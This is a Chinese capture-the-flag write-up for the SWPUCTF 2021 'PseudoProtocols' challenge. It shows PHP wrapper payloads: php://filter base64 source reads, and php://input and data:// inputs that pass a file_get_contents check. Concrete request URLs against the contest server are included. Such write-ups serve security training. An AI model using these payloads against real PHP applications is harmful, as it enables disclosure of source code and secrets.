[SWPUCTF 2021 新生赛]PseudoProtocols
[SWPUCTF 2021 新生赛]PseudoProtocols
一、题目
二、WP
1、打开题目,发现提示我们是否能找到hint.php
,并且发现URL有参数wllm
。所以我们尝试利用PHP伪协议读取该文件
wllm=php://filter/read/convert.base64-encode/resource=hint.php
2、对输出进行Baes64解码
<?php
//go to /test2222222222222.php
?>
3、访问/test2222222222222.php
<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){echo "success\n";echo $flag;
}
?>
代码的大概意思是为a参数利用file_get_contents()函数已只读的方式打开,如果内容等于I want flag
的话,输出flag。
4、接下来有两种解法
①、php://input
此方法需要条件,即开启allow_url_include=On。
实际上这相当于一个远程包含的利用。
php://打开文件流后,我们直接在流里面写入我们的恶意代码,此时包含既可执行代码。
http://1.14.71.254:28463/test2222222222222.php?a=php://input// 然后在POST里传入I want flag,则成功读取Flag
②、data://
data://本身是数据流封装器,其原理和用法跟php://input类似,但是是发送GET请求参数。
http://1.14.71.254:28463/test2222222222222.php?a=data://text/plain,I want flag
三、考点
PHP伪协议
php://filter
php://input
data://
[SWPUCTF 2021 新生赛]PseudoProtocols相关推荐
- [SWPUCTF 2021 新生赛] 第三波放题
[SWPUCTF 2021 新生赛]easyupload3.0 首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apach ...
- [SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
[SWPUCTF 2021 新生赛]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_d ...
- [SWPUCTF 2021 新生赛]easyrce
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ...
- [SWPUCTF 2021 新生赛]babyrce
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highligh ...
- [SWPUCTF 2021 新生赛]
[SWPUCTF 2021 新生赛]jicao 进入环境: <?php highlight_file('index.php'); include("flag.php"); $ ...
- CTF笔记 [SWPUCTF 2021 新生赛]pop
文章目录 一些常见魔术方法 [SWPUCTF 2021 新生赛]pop 总结 这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿f ...
- [SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 考点 反序列化 一.题目 打开题目发现如下代码 <?phpheader("Content-type:text/html;char ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- [SWPUCTF 2021 新生赛]caidao
看到这个界面,直接用蚁剑连接,密码是wllm. 找到根目录,flag就在/flag中
最新文章
- 多级中间表示概述MLIR
- 致广州达到信息技术有限公司
- Python中的正则表达式(特征匹配)
- vue.js中的v-model指令的深刻理解
- poj2032Square Carpets(IDA* + dancing links)
- 使用内存回流的方法来实现将image的内容转换为 byte[]
- Microsoft Deployment Toolkit 2010 新功能实战之一
- oracle 11.2.4联机文档,ORACLE 11G 联机文档partition_extended_name的一个错误
- Angular 7 和 .Net Core 2.2——全球天气(第1部分)
- NFS-heartbeat-drbd模拟NFS高可用
- Python之路--协程/IO多路复用
- 数据备份与数据恢复产品——程序猿的必备品
- 示例项目:简单的六足步行者
- Sqlite 对数据进行增删改查
- ps 毛发 边缘_PS技巧:毛发抠图调整边缘法
- 数学分析 函数项级数(第13章)
- java 微服务 dubbo_Dubbo Spring Cloud 重塑微服务治理
- centos 安装Times New Roman
- 华为裁员1100人!任正非痛批管理层:这种领导鼠目寸光
- 【GPGPU编程】GPGPU架构剖析之谓词寄存器